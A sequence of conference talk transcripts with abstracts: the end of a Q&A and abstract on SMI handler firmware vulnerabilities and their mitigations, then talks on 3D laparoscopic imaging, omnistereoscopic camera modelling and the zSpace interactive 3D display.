why there are like three options that the firmware should consider. And a kind of combination of those three options should be implemented, I think. But it also works for, if you know, because the SMI handlers shouldn't be installed at runtime, they should be fixed. So you know where each SMI handler is, which device it's communicating with, which MMI range it's writing to or reading from. And in that case, it might be a relatively generic mitigation because you know that in advance. But yeah, I think it's a combination of three options that should be there. Yes, that's exactly the question. Thank you. Thanks. I had actually a suggestion maybe for possible additional mitigation for some devices that should not be normally located by the US like the same SPI controller. Maybe the firmware could just store the bar and not read it from the device each time. Yeah, except when you store the bar, the cash develop, let's say a OS or exploit code relocates it. You're still writing to your original value because you cashed it and you're not using it, not reading from the device. But then you're not really talking to the device, right? I see. Yeah, the functionality is broken, but you don't care because this is an attack. The trouble is it's more than the functionality is broken. The exploit code might force you to read writes to the cash location which now might be used by something else. So there's a potential for the issue here. That's why this option three is more of a you do cash that beforehand when the firmware boots, but you also force this default location into the actual registers so you know that you're actually talking to the device as well. All right, I think that's time for the next presenter. Thank you.
|
Previously, we discovered a number of vulnerabilities in UEFI based firmware including software vulnerabilities in SMI handlers that could lead to SMM code execution, attacks on hypervisors like Xen, Hyper-V and bypassing modern security protections in Windows 10 such as Virtual Secure Mode with Credential and Device Guard. These issues led to changes in the way OS communicates with SMM on UEFI based systems and new Windows SMM Security Mitigations ACPI Table (WSMT). This research describes an entirely new class of vulnerabilities affecting SMI handlers on systems with Coreboot and UEFI based firmware. These issues are caused by incorrect trust assumptions between the firmware and underlying hardware which makes them applicable to any type of system firmware. We will describe impact and various mitigation techniques. We will also release a module for open source CHIPSEC framework to automatically detect this type of issues on a running system.
|
10.5446/32358 (DOI)
|
Okay, my talk is about something different from what you heard in that session. I will talk about an evaluation of 2D and 3D imaging systems for laparoscopic surgery from the user perspective. The research has been undertaken by two groups in Germany, one group of medical experts from the University Hospital in Munich and one group of human factors engineering experts from the Fraunhofer Heineke-Hertz Institute in Berlin. John said, I'm that little machine from Fraunhofer. Okay, let's start. 3D imaging systems for laparoscopic surgery have been around for more than two decades. And there's a large body of research showing that it's beneficial to use stereoscopic imaging in surgery so you get better results, it's better for the patients, better for the surgeons. And nevertheless, these systems have never quite made it into the operating rooms, probably because of the vision and eye problems that have been reported with early systems. So the visual discomfort was always a big topic and that there might have been other reasons for these systems not to penetrate into the practice. Another thing is that sometimes you read that only novices profit from 3D imaging so that there's a myth that once you're an experienced surgeon you don't need your eyes anymore, so your hands know everything that you need to know. That might prevent some people from buying such stuff for the operating room. But now we have new products on the market, 2D and 3D products and we have always new products on the labs of course and that was reason to reevaluate the myths I mentioned and other things like whether the eye problems are still there. And in detail our questions are the following, the first thing is that can we reconfirm that stereo is beneficial in minimally invasive surgery like laparoscopy which we expect on a theoretical basis but of course with every new investigation you have to recheck for that. Then we have a rather odd question, when 3D systems are improving is there an asymptote or what is the asymptote, how good can you get and we try to answer that question also with our research and how far away are we from that asymptote. So we wanted to see whether we can bust that myth that stereo is nothing for experienced surgeons and last not least it was interesting whether all these claims about visual discomfort from using 3D systems are still valid. What we did was of course an experimental investigation. We composed four different imaging systems which we then compared partly consisting of commercial components. First we had the first system an autostatoscopic display, a prototype produced in my institute driven by 3D endoscopy of Stortz company in Germany. Next system was a 3D display from Sony combined with the same stereo endoscope from Stortz. Then we had a 2D system provided by Stortz to the monitor and to the endoscope and that one I will explain in a minute, a mirror display that has no electronic transmission that we constructed as a kind of gold standard for benchmarking 3D systems in the future. Also a short look at the autostatoscopic system from our lab. As you see it's a portrait type display. The reasons for that I can explain in a coffee break. It has a head tracker. We have stereo cameras here that tracks the user finds its eyes and uses the information about the spatial position of the eyes to adjust the lenticular lens plate using voice call motors. The lens plate can be shifted left and right and forward and backward to make sure that the viewers eyes are always in the sweet spot of the autostatoscopic system. That's the mirror display we constructed. Let me briefly explain it. We have one mirror here onto which the surgeon is looking and it's in the same position as where you would place your ordinary LC panel based monitor. But this mirror just mirrors the image of another mirror positioned here and that mirror looks at the surgical target here. Altogether the setup looks like that. In terms of the physical arrangements it's similar to the usual operating situation in laparoscopic surgery. To have the same size or approximately the same size images as on the electronic displays we introduced magnifying lens here. You can see that it's a frontal type lens and that served also as a pivot for the instruments of the surgeons. We drilled little holes in there and the instruments were poked through the holes in the frontal lens plate. The task our subjects had to perform was to make a simulated suture on a kind of dissected gut that has to be reconnected. Thanks, you see how it is done. We have two layers of tissues here, one dissected one that has to be reconnected with the suture. We have another layer of tissue down there and it's important to first to hit the marks correctly so it's placed in the needle right in the middle of the marks and it's also important not to hurt the underlying tissue here, so like in reality. You see that that wave emotion here that comes from two imaging because the surgeon doesn't know how far he is away from the target and that goes on and on and the task stops when you have penetrated here. So it's a continuous suture. That little thing here is called a knot bench. I've brought one here if you want to inspect it later. That was the setup in the lab. On the left you see the mirror display, on the right you see the other displays or the other imaging systems that the 2D display, the 3D display with glasses based that the female surgeon is just using and the otostereoscopic display here. So all comparable setups, same lighting conditions, we try to adjust the brightness levels of the displays in the same way as good as possible. For test subjects we divided into two groups. We had 48 surgeons altogether, 24 novices and 24 experienced surgeons. The criterion was the number of leproscopic operations previously performed. Experts had on average about 800 operations and the novices, the beginners, less than 100. The test was for everybody to use all the four systems and they had to use them in a completely random order to average out learning effects. We did a lot of measurements during the task, objective and subjective measurements and I guess that's the reason why we call the study comprehensive, not because we had so many systems and inspection but because of all the different types of measurements we made. The first one is the objective measurement, performance measurement. Some examples are result quality, we had a rating system for the quality of the suture, the pass lengths that was used, how long it took and some efficiency measure here. On the subjective side we used the NASA task load index. We had the test subjects perform depth quality ratings using the RTO scale. We produced a visual discomfort questionnaire adapted after Okuyama who presented that here on that conference in 1999. Also a usability questionnaire was administered and the subjects had to perform also preference ranking for all the systems. They had to say I like that best and that second best and that's all. The results are some of the results concerning performance. As you see here, what we intended and expected is that people perform best with the mirror display. Second best also as expected with the commercial 3D system here and less good with the 2D system and very badly with the auto stereoscopic display. If you look at the task times the picture is completely the same or complementary. The fastest performance was with the mirror display, the second fastest was the commercial 3D system with glasses and worse than those two were the monoscopic system and the auto stereoscopic system. We can skip that. The NASA task load index. I don't know if you're familiar with that but we have questionnaire with six items asking for subjective load, mental load, physical load, experience and so on. You can get a maximum of 100 points which means 100 points is a very strainful task and zero points when you do nothing. You see here that the task was easy because we are in the 40s here which means that's like talking to somebody or something and so you can't do very much with the task load index here. There are differences though. Again the auto stereoscopic display was somewhat less easier than the other ones and you have the typical order here that the 3D display produces the smallest load but the figures are so similar that it wouldn't say that it makes any difference. It doesn't make any difference. The depth impression rating is very interesting. We have the best rating with the commercial 3D display. Not so good with the mirror display which hints me to the fact that depth is somewhat exaggerated with using the combination of disparity and magnification in the endoscope and display combination. Of course you have bad depth rendering in the 2D display and that needs explanation. Again not so good in the auto stereoscopic display. Visual dump with discomfort just to say it briefly is a non-issue nowadays. You could achieve six points for very bad systems and we are around one with all the systems so that there is no visual discomfort anymore. Contrary to ranking, the first rank has been occupied by the commercial 3D system here. The picture is somewhat different if you compare the mean rank. On average people think that this system is as good as the 2D system which needs discussion. My interpretation is that there is a conservative element there that people stick with the proven technology somehow. To come to the conclusion, we can skip that. I have explained everything. I should say that there is no good reason not to use 3D imaging in the operating room nowadays. You can use the mature commercial systems. You have benefits for the patient and for the surgeon. You have no problems, no eye and vision problems obviously. We hope that the auto stereoscopic systems can catch up a bit in the future because they currently obviously don't perform so well. We can discuss the reasons for that again later. When they become mature, obviously they would provide a usability advantage because you don't need the glasses and that's clearly better if the performance and other factors are equally to the glass-of-glass system. Of course, maybe you have seen that. Otherwise I go back to the first thing again. You see that the benefits that novices and experienced surgeons have are the same. Even if you are a well-experienced doctor, use a 3D system and you will perform even better. Thanks.
|
Though theoretically superior, 3D video systems did not yet achieve a breakthrough in laparoscopic surgery. Furthermore, visual alterations, such as eye strain, diplopia and blur have been associated with the use of stereoscopic systems. Advancements in display and endoscope technology motivated a re-evaluation of such findings. A randomized study on 48 test subjects was conducted to investigate whether surgeons can benefit from using most current 3D visualization systems. Three different 3D systems, a glasses-based 3D monitor, an autostereoscopic display and a mirror-based theoretically ideal 3D display were compared to a state-of-the-art 2D HD system. The test subjects split into a novice and an expert surgeon group, which high experience in laparoscopic procedures. Each of them had to conduct a well comparable laparoscopic suturing task. Multiple performance parameters like task completion time and the precision of stitching were measured and compared. Electromagnetic tracking provided information on the instruments path length, movement velocity and economy. The NASA task load index was used to assess the mental work load. Subjective ratings were added to assess usability, comfort and image quality of each display. Almost all performance parameters were superior for the 3D glasses-based display as compared to the 2D and the autostereoscopic one, but were often significantly exceeded by the mirror-based 3D display. Subjects performed the task at average 20% faster and with a higher precision. Work-load parameters did not show significant differences. Experienced and non-experienced laparoscopists profited equally from 3D. The 3D mirror system gave clear evidence for additional potential of 3D visualization systems with higher resolution and motion parallax presentation. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32360 (DOI)
|
I'm going to present now a kind of follow up of the conclusion of my first presentation for those that were here. I was talking about the review of the technology to produce a telescopic panoramas for human viewing and with a particular twist of including dynamic scenes in the problem. In that case, I conclude that, well, a multi-camera approach using a reduced number of stereoscopic samples partially overlapped could be mosaic into a full omni-stereoscopic image. And the mosaicing approach actually is an easy approach to do a frame by frame rendering and then enable omni-stereoscopic videos. So there are remaining two problems in that case and that was the follow up that we started working after doing this literature review of the technologies. One is how to mosaic these partially overlapped stereoscopic images, maintaining a consistent depth in between mosaics. So basically you don't want to see artifact. If you see artifact, there is a sign that there is something going on there. And as you see in the example I showed that stereoscopic panorama, there are not noticeable artifacts, at least no very noticeable artifacts. There are artifacts still that are difficult to erase, but that was done with the prototype. So I decided to go into modeling this, how to model how much depth, how to maintain the depth illusion in between mosaics. And also another problem that is a regular problem in panoramic vision that is at least in stereoscopic panoramas, how to deal with the vertical disparities, at least how to explain whether these vertical disparities came from and where you are expected to find those vertical disparities. So we propose a model, a very simple model to start with. And usually those models are the models that work when they are simple and represent something meaningful or give some meaningful results. And that model that I'm going to explain now is based on basically two cameras and stereoscopic rig. And with that you can explain the majority of the technologies I explained in my first presentation based on horizontal stereo. And we have some experimental results based on simulations to test this model and to extract some conclusions. And that basically is the roadmap of this presentation. Basically the model consists of these two pinhole cameras separated by a baseline. In the center we have the reference viewpoint of the panorama and these two cameras could represent a rotated pair of cameras around that center. Oh, with certain displacement it could represent the real case of a multi-camera system in which you cannot align or you cannot position these cameras altogether given the dimension of the cameras in the nodal points. And, well, we have the reference for each one of the cameras and a point in the space and in the scene could be projected into these two image planes. And using projected geometry and simple equations, basically we can infer a result, basically the horizontal disparity. We can calculate the vertical disparity for different configurations. And the different configurations are these. This simple model could be expressed in four forms. And we found that with those four forms, even though it's difficult to believe, but it could represent most of the technologies we were, I was talking in the first presentation, but not those technologies based on vertical parallax. But I don't care about those technologies because basically we were interested in the horizontal parallax problem. So the first case is two cameras that could be rotated or could be a multi-camera approach. Actually this is difficult to implement in the multi-camera configuration. The second one is basically shifting these and start rotating the cameras around the center. And one of the papers from 1998, the things that was basically could be modeled with this configuration. The other configuration is this place in this radial distance RC from the center. And that basically represented in a multi-camera approach based on this configuration, on this stereoscopic rig, when you put multiple stereoscopic rig around that virtual rotation center. The case in which the nodal point of these cameras cannot be in the center all the time. In this case, for example, you cannot represent this in multi-camera pressure because all the cameras cannot be around coexisting in a space, co-located in a space with this, the same nodal point. And the last case is basically this one rotated when shifted BW2, B divided by 2 to the other direction. So basically you have this stereoscopic rig, one is centered in one of the cameras and the other is centered in the midpoint in between the nodal points of two cameras. These four configurations, for example, let's take this last configuration, configuration for that I was showing before. Well, this represents a single rotating stereoscopic rig at that distance with respect to the center, a multiple cameras approach which each one of the cameras have certain spatial location with respect to the other stereoscopic rig, which is this multi-camera approach, or this multi-camera approach with our right, multiple n number of cameras rotated around the center or fixed around the center, all represented with the same model. To give an example, let's say that we have this model and we have two sequential acquisitions separated by an azimuth angle of theta2e. So we have one pair of the same, one stereoscopic pair and the other stereoscopic pair. Now let's say that in that configuration we decided to take six stereoscopic samples. And this is starting by 0 to 5. We have six stereoscopic samples of the same, partially overlapped, constitute these two sequence of images and this is the dataset we acquired. Could be sequential, could be simultaneously. Now what areas in the, when we start most hiking this, we can differentiate. We have an overlapping region here when the point in the scene is visible by the two stereoscopic rigs or by the, by two samples of the scene. And these areas that are visible by only one stereoscopic rig at a time. When we mosaic, we can define a fixed position or two mosaic that depends on the number of the telescopic samples. In this case, it's this position in between the scene. This is the image. This is the reference center of the image and this is a position that is symmetrically located with respect to the center. Now is that the optimal? No, it's not the optimal. It's a position reference that you can use as a, you have six stereoscopic samples and you have this width of the image and then you can basically by eye say, well, this is the point when I had to stitch all the images in order to create the 360 degree view of the image at least in a scene mode. But it's not the optimal point. We can see that. Those point that we saw before, well, this P2 and P3 are the point that are visible only by, in this case, of P2 by this stereoscopic rig and this P3 by this. P4 is the one that is in the overlapping region of the two images, which I call the homestereoscopic field of view of the whole arrangement. Now coming back to this model, any point of the scene could be represented in the reference frames of each one of the cameras by this equation. With R is the rotation. In this case, the two cameras are restricted to be in the XZ plane. And the theta, so I represent the Asimut sample angles between the two. Y is always parallel to the Y, the global reference frame. So basically the two cameras are restricted to one single plane and they have the parallel axis and basically they are rotated in this direction. So you can be represented all the different positions by this single equation. And by this translation, they represent the translation in between left and right. From this relative coordinates of the scene in each one of the cameras, you can, using projective equations, find the coordinates in each one of the image, the X and Y coordinates for the left and right for each one of the theta, so I. Following up that logic, you can talk about the horizontal disparity error, which is what is the difference in horizontal disparity that is going to be in the overlapping region of the images or two images or two telescopic pairs that we need to mosaic. When that difference is larger than the threshold of human resolution of horizontal disparity, then we're going to be noticed. So if it's below what we can perceive, therefore it's not going to be visible and we can teach it safely. So we can infer what is the horizontal disparity expression from those previous equations for theta sub i, for any theta sub i and n theta sub i plus 1. So for two consecutive samples, in any, the symmetry of the problem, we just need to study two consecutive samples. There are certain simplifications that could be done here, for example, the set or the depth with respect to one telescopic pair or the left or the right, it's going to be the same. So we can reduce this to this singular distance with respect to one single camera and it's going to be different than the one that is seen by the other camera. And then talking about the error, the absolute difference between these two magnitudes. When manipulating the equations, you can reach something very simple, which is the horizontal disparity error, it depends on the difference of the reciprocal of the depth as seen by each one of the stereoscopic pair. Now translate it to each one of the four variations of the same model and then you can describe all you want, at least in terms of horizontal disparity. Now what is the traditional horizontal disparity for in humans? And that is a nice topic of research because basically for some, in some literatures, I found that, for example, this equation came out by comparing the same basic parallel optical axis, the stereoscopic pair model using pinhole cameras with the resolution of the human eye based on psychological styles, based on several tests in certain group of human with certain selection of images, whether those images have certain texture or not and that number change. But the evaluation, when you put the two equations together, you can reach a horizontal threshold. This is the error, the threshold in the horizontal disparity error that human perceive based on this pinhole stereoscopic pair and the human model, which is baseline, the baseline between the human eye and this is the distance between human eyes. So basically if you, the baseline of this virtual stereoscopic rig is the same than the distance between the interocular distance between humans, you can simplify this. This parameter is the angular resolution perceived by human and that threshold is about 20 arc of second, which is quite slow, quite low and this number here of threshold gives something that is 25 times smaller than the width of a pixel. So basically it's no use, it's no use in this form. So this is going to be lower than the width of a pixel for a regular camera, you cannot use it. So what we always move to use the width of a pixel as a threshold, which is a practical approach given that the width of the pixel is basically what we need when we mosaic stereoscopic images. If the error is larger than the width of a pixel, it's going to be noticeable. If it's low, it's not going to be noticeable. And it happens also that it maintains the continuity in the horizontal disparity. So if you consider something larger, 25 times larger, that 20 arc of second is close to one arc of a minute of resolution. So we said probably that is the correct one, the correct answer, even the technology we had today. And basically it looked good, so you must be correct. So we started simulating based on our model using that threshold of one pixel. For this particular camera, using real numbers, the sensor width of this kind of 400D, an angular field of view based on a fisheye commercial lens that we could use in our experiments. And in the baseline of more or less half the interlocular distance in the human population, 35 millimeters, and a radial distance for this particular configuration, 3 and 4, equal to the baseline, 35 millimeters. So we tried to compare the different cases and we came out with this plot. The minimum distance between the scene and the camera to have a continuous horizontal disparity. So basically what we are plotting here is that the difference between the point we choose by XB in the image, moving 5 percent towards the center of the image or minus 5 percent towards the edge of the image. And that correction give us this plot that, for example, if we are using that point choosing deterministically, we found that, for example, the configuration 3 and the configuration 3, for example, the scene had to be 2 meters from the scene when you use 6 samples. When you use 8 samples, basically that overlapping region moves closer to the center of stereoscopic pairs and that changes a little bit closer to the camera. So that is important. No, it's not important because basically, for practical reasons, if I build a camera and I want to determine one model is better than the other or one configuration of multicameras is better than the other based on this, I will say, well, I really don't care if the scene is 2 meters from the camera or 1 meter from the camera. And listen to micro-omnistereoscopic images where things are very close to the camera and the thing is small. But in normal cases, if I put my camera here and I want to create an omnistereoscopic image that you guys over there and me here and I am at 3 meters, well, I'm not going to have any problem if I choose that threshold to mosaic the images. But it had to have some uses. Well, the use is basically the other thing that we're interested in using this result to say we can define an optimal cut for the mosaics that is based in an energy fraction that consider this horizontal disparity resolution in humans. So when you introduce that into the algorithm of optimal cut, the same scene could be cut in a different way when you mosaic for elements that are closer to the camera and elements that are far away from the camera. You can find the point in between two mosaics where you can basically blend them and then make invisible any artifact that will happen otherwise if I use a fixed stitching point. And basically you can put this for each one of the models or all the configuration you can imagine. And that's how, well, that is an interesting result. There is a vertical disparities. Vertical disparities in panoramas always appear. But based in this model, the vertical disparities, based in an stereoscopic vertical disparity in the stereoscopic area of each one of the camera should be zero because based on this equation, the projection on the image plane, this value and this value of the distance of the scene is equal to this. For each one of the stereoscopic pair, we say that the set is equal to each other. So this value simplifies. And basically if they are aligned, happen that in reality this never happened because the optical axes are not really parallel and they are misaligned. So you have to do some correction, some stereoscopic registration. But if you do that, basically you wouldn't have any problem in these areas. But you will have problems in the overlapping areas. And that problem happened not in between left and right, but in between left and in the left sequence of images and in the right sequence of images. And that happened when you do this comparison. You see this expression that gives this number is a multiplicative factor over this Y. Why is the elevation with respect to the center? When we are talking about the equatorial area here, it should be zero. So it's going to be aligned. But the more you look up or you look down, you will have a multiplicative factor that affects that. And the larger is going to be this part. The more you need to warp the images in order to make it aligned. But we are talking again with respect left to left, right to right. And to see this graphically, you see when the scene is far away from the camera, that effect doesn't matter. Because basically that disparity is going to be not noticeable. But when you're taking a panorama here and imagine what happened in the roof or in the floor that are closer to the camera, meaning closer distance from the camera, this is the distance to the camera, the multiplicative factor is going to be larger. And that's what is playing, what is always look misaligned and always have to do some kind of warping in that direction. I'm talking always when I don't have extra information about the depth in order to match pixels. All right. And here you see what happened at different distances. So basically all these analysis was to put together a model that could represent all the different omnistereoscopic technologies with horizontal parallax. And it's flexible and simple enough to represent this. We came out with a result that could be used for the device at optimal cut. And we explained some issues that happened with vertical disparities. Well that is my presentation and I hope you enjoyed it. Thank you.
|
CONTEXT: In recent years, the problem of acquiring omnidirectional stereoscopic imagery of dynamic scenes has gained commercial interest and, consequently, new techniques have been proposed to address this problem [1]. The goal of many of these novel panoramic methods is to provide practical solutions for acquiring real-time omnidirectional stereoscopic imagery suitable to stimulate binocular human stereopsis in any gazing direction [2][3]. In particular, methods based on the acquisition of partially overlapped stereoscopic snapshots of the scene are the most attractive for real-time omnistereoscopic capture [1]. However, there is a need to rigorously model these acquisition techniques in order to provide useful design constraints for the corresponding omnidirectional stereoscopic systems. OBJECTIVE: Our main goal in this work is to propose an omnidirectional camera model, which is sufficiently flexible to describe a variety of omnistereoscopic camera configurations. We have developed a projective camera model suitable to describe a range of omnistereoscopic camera configurations and usable to determine constraints relevant to the design of omnistereoscopic acquisition systems. In addition, we applied our camera model to estimate the system constraints for the rendering approach based on mosaicking partially overlapped stereoscopic snapshots of the scene. METHOD: First, we grouped the possible stereoscopic panoramic methods, suitable to produce horizontal stereo for human viewing in every azimuthal direction, into four camera configurations. Then, we propose an omnistereoscopic camera model based on projective geometry which is suitable for describing each of the four camera configurations. Finally, we applied this model to obtain expressions for the horizontal and vertical disparity errors encountered when creating a stereoscopic panorama by mosaicking partial stereoscopic snapshots of the scene. RESULTS: We simulated the parameters of interest using the proposed geometric model combined with a ray tracing approach for each camera model. From these simulations, we extracted conclusions that can be used in the design of omnistereoscopic cameras for the acquisition of dynamic scenes. One important parameter used to contrast different camera configurations is the minimum distance to the scene to provide a continuous perception of depth in any gazing direction after mosaicking partial stereoscopic views. The other important contribution is to characterize the vertical disparities that cause ghosting at the stitching boundaries between mosaics. In the simulation, we studied the effect of the field-of-view of the lenses, and the pixel size and dimension of the sensor in the design of the system. NOVELTY: The main contribution of this work is to provide a tractable method for analyzing multiple camera configurations intended for omnistereoscopic imaging. In addition, we estimated and compared the system constraints to attain a continuous depth perception in all azimuth directions. Also important for the rendering process, we characterized mathematically the vertical disparities that would affect the mosaicking process in each omnistereoscopic configuration. This work complements and extends our previous work in stereoscopic panoramas acquisition [1][2][3] by proposing a mathematical framework to contrast different omnistereoscopic image acquisition strategies.
|
10.5446/32361 (DOI)
|
So, good afternoon. It's a pleasure to be here. ZSpace builds an interactive 3D virtual holographic workstation for a user that is really immersive. It's very realistic. It feels incredibly realistic. And I'm going to be describing the system today. Now, before we actually describe the system, I'd like to sort of set the context and explain what does it mean when something is immersive? And certainly, you know, we're at a 3D display conference. The display itself is important, but there are many other factors which are really important that creates a truly immersive experience. Now, what does immersive mean? The founder of ZSpace is a cognitive scientist, and he likes to use this term, cognitive levers. What is a lever? I'm sure all of you guys have seen this or heard of this very famous quote from our comedies, give me a place to stand with a lever and I can move the world. Meaning it's a very small thing when applied at the right place with the right amount, it can move mountains. What's a cognitive lever? A cognitive lever are those things in our cognition and our perception that activates our brain. So, basically, if there's something that's really small that you catch maybe in the peripheral of your vision or in your body or your hearing or something like that, it really triggers a, a ha moment. And that ha moment is when all the little gears line up in your head and you say, oh, I'm looking at something real. So, we believe that there are these levers in your brain that really trigger the spatial, the analytical, on the, the, the intuitive aspects of your head and of your brain. And some of these levers that we'd like to call cognitive levers are here. Certainly the second one we've been talking about all day, a really good 3D display, stereoscopic display will give you that sense of immersive experience. Really great 3D graphics in applications. This is SDNA, of course, so applications has got to be part of it. Providing motion parallax. We've heard that a lot, whether it's horizontal motion parallax or vertical motion parallax or coming in and out. To have motion parallax, even without stereo, is incredibly powerful. Another cognitive lever. And I'm going to talk to you a little bit more about the proprioception. This is a cognitive lever, which is how you, you know your body exists in space. I know that I'm, my right hand is here, my left hand is here, it is tilted at this direction. That's proprioception. And that is also an incredibly powerful cognitive lever. The thesis of our company is that if you engage a collection of these levers in the proper sequence with a proper mix, the user experience becomes very, very immersive. It becomes real. So that's the context of cognition and immersion. Now what is our system? The Z-space system consists of the following parts. First of all, there's a full color HD display, stereoscopic display. I'll match with that as a pair of very lightweight polarized glasses. And they're tracked. It says they're tracking eyewear. How are they tracked? They're tracked by some tracking cameras that are built into the bezel. You can, you can see a little bit of it there and there. Tracking cameras. In addition to that, as I mentioned about proprioception, manipulating with a user input is really important. And for that purpose, we provide a really unique stylus that allows you to interact with the virtual objects directly, shall we say. And then finally, on top of that, we provide a very innovative software development platform on which you can build incredible applications. And I'll show you some examples of that later on. The combination of all of these triggers the user to say, oh my gosh, this looks real. This feels real. I'm looking around objects. I'm interacting with objects. And so I'll show you a little bit example of how people react to Z-space when they first play with it. What you're seeing is a augmented reality version of it. It's, you can produce it in real time. But the person wearing the glasses sees everything in 3D. This shows that you can collaborate through a network of Z-space systems. You can interact with it with your 3D stylus. It looks so real, people are just shocked like this. So how do we do that? So let me now describe the various components of the system. We'll start with the display. The display is a 24-inch display. It's custom built for us as Z-space. There is a TN display. There is a segmented backlight. And then in front of the TN display is a polarizer switch, a polarization switch. Let me briefly talk about the polarization switch. What is it? Well, it's TN cell, just like the LCD is. If we subject the TN cell to a low voltage, it induces, after the quarter-way plate, a circularly polarized light. In this case, it's for the left view. And similarly, for another frame, we turn it to high voltage. It lets light go through the quarter-way plate. And what we get is the other circularly polarized light. So counterclockwise versus clockwise. And one of them goes through a left lens. And one of them goes through the right lens, like this. So then the left eye will only see the left image because the circularly polarized light will go through the left lens and gets passed to the user. The right eye will see essentially nothing because it's polarized, circularly polarized the wrong way. So it's just blank. And then similarly, when it's time for the right image to come in, one frame later, the right eye sees this image and the left eye sees essentially blank. And we just swap back and forth. So that's time sequential using passive polarized lenses. Now, one of the problems with using time sequential displays is the fact of progressive scanning. That we display an image, let's say we display the left image a row at a time, starting from the top and then we sequence down. And then we write the right image, a row at a time, starting at the top and we go all the way down. So what kind of problem does that cause? Well, let's imagine you're looking at this time, this point in time. What image is actually on the LCD? Well, on the bottom part, it's still the left image because we haven't started writing the right image. The right image, we start writing right here. So let's say we start writing right here and at this point in time, we've written this segment, maybe we've written this portion. So this top half, we're seeing the right data. However, on the bottom half, we're still seeing the left data. It's left over from the previous time and we haven't gotten around to writing it. So when you look at it in this instant in time, what are you going to see? You're going to see a mixture of left and right images. And once that's on there, you know, your brain sees it and you can't pull it apart anymore. So what do we do? Well, we have to hide it. We have to hide the fact that part of the image is for the right eye and part of the image is left by. And we hide it by using a segmented backlight. So here's what we do in our system. We segment the backlight into, it turns out we have five segments, even though this picture only shows four. Nevertheless, so we, the left image is written one segment at a time. So it's written right here for the first portion of the frame. And at the same time, we turn on the, we know that it's going to take a certain amount of time, three, four milliseconds before that image is stable. And the same thing happens with the polarization switch. We turn it to the left, we turn it for the left eye and we set the polarization switch for the left state. However, we don't, we hide it. We don't actually turn on the backlight until both the polarization switch and that segment has settled down, you know, after this amount of settling time. And at that point, we turn on the segmented backlight. We turn on the LED just for that burst. For the rest of the time, that LED is off, so you don't see anything. So we're hiding the mixture, shall we say, and we turn on the LED just at that little spot. And then we turn it off and then we write the right image. And we, and similarly with the right polarization train. And then we turn on the LED right at the last minute and we pulse it. And we do that for all of the segments. So we actually just pulse it segmented, no, segmented by segment by segment sequenced in time so that we only see the correct image at the correct time for a brief second. So that's how we deal with separating the left and right carefully and well to minimize the effect of ghosting. So that's a display. Let's talk a little bit about the tracking itself. We need to track so that we know where the left and right eyes are, right? And the way we do it is we use optical tracking. And I'll just briefly tell you what we need to do. For tracking, we need to give the left and right eye, we have to tell the position as well as the orientation, the yaw, pitch, and roll of whatever target that we're using, we're tracking. Together, the position and the yaw, pitch, and roll gives us six degrees of freedom that we have to track. And we use very simple, conceptually simple idea of triangulation. We have two cameras that look at a particular point out in space, let's say my left eye. And using a little bit of geometry, we know the distance D, we know where that left eye is by measuring the angles alpha and beta, and bit of geometry and a miracle occurs, we solve for the distance Z. And then we can also get all the distance x and y similarly. So we do that for a number of points and we can get the position, the coordinates x, y, and z for any target, not just your eyes. That just gives you x, y, and z. Now what do we do about the yaw, pitch, and roll? We take advantage of the fact that any three non-colonial points determine a unique plane. And we measure three points of any object with respect to some reference point, let's say the upper right hand corner of this picture. And what we get is a rotation matrix that represents exactly the plane of those three points to our origin. And that gives us the yaw, pitch, and roll. The system that we use is this wave. We have reflecting reflectors that are located right on the glasses, because we have to wear glasses anyway. We illuminate the reflectors with infrared LEDs, and then we look at the reflections through an infrared camera built into the bezel. And then we do some post-processing from triangulation and we get the images properly. Just as an idea of what happens when you combine head tracking with real-time rendering, this is what happens when you don't have any motion parallax. And this is what happens when you have motion parallax. Even in the absence of stereo, this is incredibly immersive. It gives you a sense of depth that you just can't get anywhere else. So that's the first thing. Tracking of glasses gives us motion parallax. Now I mentioned that you can also use a unique stylus to pick up and rotate and manipulate the objects. How do we track this stylus? Well, we do it partly also with optics. We're also looking at the front and back tips of the stylus. But the stylus has to be very accurate. For proprioception to work, every millimeter you move, every tenth of a degree you twist, has to be detected. In order to get that kind of rotational accuracy, we also have to track using rotational MEMS sensors. So we put in a gyroscope and we put an accelerometer into the stylus. And we measure the angle of rotation as well as the direction of gravity to resolve for any ambiguities. And we fuse that together with some column filtering with optical tracking. We get an incredibly accurate six degree of freedom tracking of the stylus. I'll give you a quick idea through by using a video of what that can give you. So here is a, we can pick up a heart, twist it one for one. I move one millimeter in my hand and a heart moves one millimeter. I twist it. The stylus also has multiple buttons. So I can use different buttons to say turn parts of the heart transparent. I can also choose a different tool. In this case I choose a 3D spline tool where I sort of build a 3D, I don't know, a roller coaster you might say. And wherever my hand moves, I can drop a dot. Now you combine that 3D manipulation with motion parallax and I swear it feels like you're dealing with a real heart. It's incredibly, incredibly immersive. An application where such a combination of motion parallax and direct manipulation is echo pixel. So this is an actual scan of a 12 year old girl and that scan has been filtered with some density filters and you're actually looking at her torso as she manipulates. And Beth is putting exactly the right view you want. And then she can pick up the slice. The slice plane could be moved in any way you want, in any orientation, in any position. So that's an example of the power of direct manipulation and the power of proprioception in conveying a sense of realism. So my time is almost up so let me give you my conclusions. So I presented a seroscopic system and I stress award system. It's not just a 3D display. We talked about segmented backlight which minimizes ghosting for stereoscopy. We talked about how optical tracking of the glasses allows you to do motion parallax in all three dimensions. Optical and inertial tracking of the stylus then gives you direct manipulation of the object. And really compelling software that creates imaging, medical imaging, education, simulation, computer ray design, all sorts of applications that sit on top of this platform. And so a combination of these optical, inertial, cognitive and perceptual cues then create an incredibly immersive user experience. It's lifelike, realistic and very, very interactive. So that's our Z-Space system and I, as Greg mentioned, I will bring a system tomorrow afternoon. So come to the demo session in ballroom 4 and you can play with it yourself and hopefully we will elicit a wow from you. Thank you for your time.
|
We present a description of a time sequential stereoscopic display which separates the images using a segmented polarization switch and passive eyewear. Additionally, integrated tracking cameras and an SDK on the host PC allow us to implement motion parallax in real time. © (2014) COPYRIGHT Society of Photo-Optical Instrumentation Engineers (SPIE). Downloading of the abstract is permitted for personal use only.
|
10.5446/32363 (DOI)
|
